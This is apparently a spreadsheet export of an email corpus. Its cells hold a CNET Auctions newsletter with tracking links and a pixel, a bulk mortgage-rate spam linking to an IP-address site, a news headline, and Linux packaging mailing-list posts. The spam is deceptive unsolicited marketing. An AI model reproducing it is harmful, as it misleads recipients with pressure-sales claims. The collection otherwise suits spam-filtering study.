 &lt;font face="arial, helvetica" size="-1"&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4N635Q3AAwQ4lAUw-5WsR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/cdrw.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4eiRV6tlZxrhBm0WHthZR" &gt;
 &lt;b&gt;LG 12x8x32 CD-RW / 8x DVD-ROM Combo Drive&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$79&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/dispatch/pricedrops.gif"&gt;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=14-5MRAIF-zaHxXyus8ZvQIzTKtR1dR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/lexmark82.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAHEzze5sNyGEI9rCM8vcR" &gt;
 &lt;b&gt;Lexmark Z-82 Printer/Copier/Flatbed All-in-One&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$1&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img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href="http://clickthru.online.com/Click?q=3e-F51nIizXe2Q9x53_7DQESNPe-iRR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/dispatch_PC.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZKAREXZ4-u0O9U4lR0vdknR" &gt;
 &lt;b&gt;P4 Celeron 1.7GHz/256MB PC-133&lt;br&gt;nVidia 32MB/16x DVD-ROM/20GB PC&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$399&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=69-CY-iIoWgGq9O_WFMoAH4OpRzLxrR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/joystick.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=7e-XDXeInptAgo7FQwi6pURwMpopriR" &gt;
 &lt;b&gt;Gravis Blackhawk Digital Programmable Joystick&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$6.50&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=93-V4PmQSdQT6N90HjcTYjvQ8Rgn5FR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/flat_panel.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZk8csjLBCDtZs6swzdON9R" &gt;
 &lt;b&gt;Gateway 15-inch TFT LCD Flat Panel Color Monitor&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$319&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/dispatch/pricedrops.gif"&gt;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=bd-c0nUQ7pyt1NRJwjpAEVgnfqGsJuR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/dispatch_PC.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULwlGSXArU3Gl22vbAOyesR" &gt;
 &lt;b&gt;PIII 733MHz/256MB PC-133/48X&lt;br&gt;64-Bit Sound/8MB 2X AGP/20GB PC&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$299&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5&gt;&lt;img src="http://auctions.cnet.com/images/gdot.gif" height=1 width=100%&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/font&gt;
 &lt;/table&gt;
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXfH1zRGhVqS8CMB0qvsZR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/sub_end.gif" width=310 height=19 border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwF4F4EaAZa9-0t3VVat9dR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/monitor.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-Xienjcbl-pEvKY-qkCKsR" &gt;
 &lt;b&gt;Displaysonic .28mm 17/20/21-inch Multisync Monitors&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3 align=center&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; All Starting Bids at &lt;b&gt;$9&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/icon_gold.gif"&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;
 &lt;table width=100% cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;b&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 Ending Thursday:&amp;nbsp;&lt;br&gt;
 Ending Friday:&amp;nbsp;&lt;br&gt;
 Ending Monday:&amp;nbsp;&lt;br&gt;
 Ending Tuesday:&amp;nbsp;
 &lt;/td&gt;&lt;td&gt;
 &lt;b&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href ="http://auctions.cnet.com/cgi-bin/dp?880018"&gt;NEC .28mm 21-inch&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href ="http://auctions.cnet.com/cgi-bin/dp?881381"&gt;Sony .28mm 20-inch&lt;/a&gt;&amp;nbsp;&lt;br&gt;
 &lt;a href ="http://auctions.cnet.com/cgi-bin/dp?879130"&gt;Sony/Sun .28mm 17-inch&lt;/a&gt;&amp;nbsp;&lt;br&gt;
 &lt;a href ="http://auctions.cnet.com/cgi-bin/dp?880563"&gt;Sony/Sun 20-inch Multisync&lt;/a&gt;&amp;nbsp;&lt;br&gt;
 &lt;a href ="http://auctions.cnet.com/cgi-bin/dp?881631"&gt;Sony/SGI 20-inch Trinitron&lt;/a&gt;&amp;nbsp;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5&gt;&lt;img src="http://auctions.cnet.com/images/gdot.gif" height=1 width=100%&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/font&gt;
 &lt;/table&gt;
 &lt;P&gt;
 &lt;/P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2adPzMFFSkMRUVolYrBZR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/sub_add.gif" width=310 height=19 border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIslD0LNj1Y0VXXjhrHNHdR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/canon656u.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPuvQTHDBJlh9GpMUHM3rR" &gt;
 &lt;b&gt;Canon CanoScan N670U 48-Bit Flatbed Scanner&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$1&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img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href="http://clickthru.online.com/Click?q=66-kDH_IyWIFdXhGOmsPj9y-DzbW-iR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/gateway.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIOdzgoUxbDr4q1O7VpJlR" &gt;
 &lt;b&gt;Gateway XP P4 1.8GHz/256MB PC-266 DDR&lt;br&gt;
 40GB 7200RPM/24x10x40 CDRW/16X DVD PC&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$629&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/dispatch/pricedrops.gif"&gt;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=90-wHZMQ_IdCT2V6rkVb8HYULuonX9R" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/hdd.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTGfVoQKLsIC1b2OB8OEuR" &gt;
 &lt;b&gt;Maxtor 80GB ATA/100 5400RPM IDE Hard Drive&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$79&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=ba-m-45QXpKFQ7rXYfxhOmI_uIUEksR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/memory.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2ht-MMUhJaylIO7r3fxZR" &gt;
 &lt;b&gt;256MB PC-2100 Double Data Rate&lt;br&gt;(DDR) 184-Pin (32x64) RAM&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$60&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/dispatch/pricedrops.gif"&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5&gt;&lt;img src="http://auctions.cnet.com/images/gdot.gif" height=1 width=100%&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/font&gt;
 &lt;/table&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a name="h5"&gt;&lt;img src="http://www.cnet.com/i/nl/au/sub_ques.gif"
 width=310 height=19&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
 Please send all questions, comments, and concerns regarding the CNET
 Auctions Newsletter to &lt;a
 href="mailto:auctions@cnet.com"&gt;auctions@cnet.com&lt;/a&gt; and include the
 Newsletter title in the subject line.
 &lt;p&gt;
 &lt;b&gt;NOTE:&lt;/b&gt; All product information, including prices, features, and
 availability, is subject to change without notice.
 &lt;P&gt;
 &lt;a name="h6"&gt;
 &lt;!-- /main content --&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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href="http://www.cnet.com/subscription/0-16335.html?EmailAddr=#EmailAddr
 #"&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18"
 border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;&lt;p&gt;
 &lt;A NOTRACK HREF="http://clickthru.online.com/Click?q=e5-9ZpOrvyBltH3wCoY0KdxohT89DVvh9RR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email='&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO2Y5wLUOytvDA4oSMpoLsR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjktmuKDz9sUb9HGRJ1bfZR"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href="http://clickthru.online.com/Click?q=25-inepIbdXN8k2vpOZTscR7jeQrFuR" &gt;&lt;img
 src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37"
 border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzD8mqLonx7JR1rqAFZcCsR" &gt;&lt;font
 color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU8lzXw42v8g-rrsLKFK0PR" &gt;&lt;font
 color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfXFMJIWsNGWF8w6YrPhnR" &gt;&lt;font color="#000000"&gt;Tech
 news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBfv13jNywmFz_e0CvgparR" &gt;&lt;font
 color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn70UaQIitPDuYWD0V_WyRR"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size="-2"&gt;&lt;tr:ad
 name="copyright"/&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=a3-qXh6-kUFqYomGPmyr_Wcvl39gsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 6.25 30 yr fixed. No points, No Fees ngw
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;table height="338" cellSpacing="0" cellPadding="0" width="539" border="0" style="border:12px double #006600; border-collapse:collapse; padding-left:4; padding-right:4; padding-top:1; padding-bottom:1" bordercolor="#111111" bordercolorlight="#FFFFFF" bordercolordark="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width="4" height="423"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td vAlign="top" align="left" width="535" height="423" style="border-style: solid; border-width: 0"&gt;
     &lt;table cellSpacing="0" cellPadding="4" width="95%" border="0" bgcolor="#FFFFFF" style="border-collapse: collapse" bordercolor="#111111"&gt;
       &lt;tr&gt;
         &lt;td vAlign="top" align="right" height="424"&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="100%" border="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;
               &lt;br&gt;
               &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font color="#000000"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Dear 
               Homeowner,&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
 &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;
               *&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FF0000"&gt;6.25% 
               30 Yr Fixed Rate Mortgage&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font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
             &lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="504" border="0" style="position: relative; border-collapse: collapse" bordercolor="#111111" height="1"&gt;
           &lt;tr&gt;
             &lt;td vAlign="top" width="325" height="1"&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;br&gt;
               &lt;/a&gt;
               &lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=b35"&gt;Click Here for a Free Quote!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.63/index.html?ID=A11"&gt;
               &lt;/a&gt;
             &lt;/div&gt;
             &lt;p&gt;&lt;b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Lock 
             In YOUR LOW FIXED RATE TODAY&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;dl&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;NO 
               COST OUT OF POCKET&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;NO 
               OBLIGATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;FREE 
               CONSULTATION&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
               &lt;dd&gt;&lt;b&gt;&lt;font face="Webdings" size="5" color="#FF0000" PTSIZE="10"&gt;
               a&lt;/font&gt;&lt;/b&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;&lt;b&gt;ALL 
               CREDIT GRADES ACCEPTED&lt;/b&gt;&lt;/font&gt; &lt;/dd&gt;
             &lt;/dl&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana,Arial,Helvetica,sans-serif" color="red" size="2"&gt;
               &lt;b&gt;
               &lt;a href="http://66.231.133.63/index.html?ID=b35"&gt;Rates as low as 
               6.25% won't stay this low forever CLICK HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
 &lt;font size="2" PTSIZE="10"&gt;
               &lt;b&gt;
             &lt;font face="Verdana,Arial,Helvetica,sans-serif" style="font-size: 6pt"&gt;
               * based on mortgage rate as of 5-15-02 as low as 6.25% see lender 
               for details&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td vAlign="top" width="4" height="1"&gt;
             &lt;div align="right"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td width="175" height="1" bgcolor="#FFFFFF" bordercolor="#006600"&gt;
             &lt;h1&gt;&lt;span style="vertical-align: middle"&gt;
             &lt;font face="Webdings" style="font-size: 200" color="#006600"&gt;
             &lt;a href="http://66.231.133.63/index.html?ID=b35"&gt;
             &lt;font color="#006600"&gt;H&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/span&gt;&lt;/h1&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="3" width="472" border="0"&gt;
           &lt;tr&gt;
             &lt;td colSpan="2" height="64"&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
             &lt;table cellSpacing="2" cellPadding="0" width="482" border="0" height="38"&gt;
               &lt;tr&gt;
                 &lt;td width="327" height="36" style="border-style: solid; border-width: 0"&gt;
                 &lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;Apply 
                 now and one of our lending partners will get back to you within 
                 48 hours.&lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" style="font-size: 6pt"&gt;&lt;/td&gt;
                 &lt;/font&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
                 &lt;td width="141" bgcolor="#FF0000" height="36" style="border-left-style: solid; border-left-width: 1"&gt;
                 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FFFFFF" size="4"&gt;
                 &lt;a style="text-decoration: none" href="http://66.231.133.63/index.html?ID=b35"&gt;
                 &lt;font color="#FFFFFF"&gt;CLICK HERE!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;
             &lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;To Be Removed Please &amp;quot;&lt;a href="http://66.231.133.63/final/index_remoov.html?ID=b35"&gt;Clicking 
 Here&lt;/a&gt;&amp;quot; . &lt;/p&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Blair challenge to IRA
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688970,215/
 Date: 2002-10-09T03:15:21+01:00
 PM calls for major arms deal to save Stormont.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Zoot apt/openssh &amp; new DVD playing doc
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Oct 08, 2002 at 04:36:13PM +0200, Matthias Saou wrote:
 &gt; Two new things today :
 &gt; 
 &gt; 1) I've had to install a Red Hat Linux 6.2 server because of an old
 &gt; proprietary IVR software that doesn't work on newer releases :-( So
 &gt; I've recompiled both the latest apt and openssh packages for it, and
 &gt; they are now available with a complete "os, updates &amp; freshrpms" apt
 &gt; repository at apt.freshrpms.net, for those who might be interested.
 Oh, neat.
 I have similiar thing in my hands, though it might be migratable if I
 had the time to try. I've been using another 6.x repository though.
 http://apt-rpm.tuxfamily.org/apt
 Anyone tried (dist-)upgrade from 6.x to 7? Theoretically it should drop
 in some -compat's (notably libc) and upgrade the rest and after a reboot
 and maybe a new kernel (and grub, but I have long before put those to
 v6's :) run just fine. Haven't had a spare machine to try it on myself,
 though.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fluxbox
</t>
  </si>
  <si>
    <t xml:space="preserve">I've noted that there are packaged versions of
 Blackbox and hackedbox available from FreshRPMs.  What
 about FluxBox? http://fluxbox.sf.net
 I'd certainly enjoy a packaged version, since its
 creators seem hesitant to provide .rpms (.debs, yes,
 but no .rpms).
 .Doug
 __________________________________________________
 Do You Yahoo!?
 Yahoo! Finance - Get real-time stock quotes
 http://finance.yahoo.com
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: patent on TMDA-like system
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 On Tuesday 27 August 2002 07:45 am, Justin Mason wrote:
 &gt; Tony Svanstrom, on SpamAssassin-talk, noted this US patent:
 &gt;
 &gt; http://appft1.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&amp;Sect2=HITOFF&amp;u=/netah
 &gt;tml/PTO/search-adv.html&amp;r=62&amp;f=G&amp;l=50&amp;d=PG01&amp;s1=spam&amp;p=2&amp;OS=haiku&amp;RS=spam
 &gt;
 &gt;   Method of anti-spam
 &gt;
 &gt;   Abstract
 &gt;
 &gt;   A method of anti-spam is to set an optional trustcode, or a trustlist, or
 &gt;   at least a trustweb based on online mail delivery at a recipient's e-mail
 &gt;   address. A mail sender is compelled at the first time to deliver a mail
 &gt; by way of: taking the way of "Visiting trustweb and sending online", or
 &gt; enclosing the recipient's trustcode in the mail and sending in another way
 &gt; other than the mentioned. After the sender's e-mail address has been stored
 &gt; automatically in the recipient's trustlist, the sender may send mails to
 &gt; the same recipient in whatever the ways feasible.
 &gt;
 &gt;
 &gt; Sounds a lot like TMDA to me. :(  Filing date is July 26, 2001,  granted
 &gt; May 16, 2002.
 &gt;
 &gt; TMDAers, have you seen this before?  I'd presume TMDA is prior art, but
 &gt; still, it could be troublesome...
 &gt;
 &gt;
 I took a bit of time to review what is on the above URL.  If I were a news 
 editor, the headline would be:
 "Inventor" from country that ignores patents and copyrights, seeks patent for 
 inventing the wheel!
 - -- 
 - ------------------------------------------------------------------------
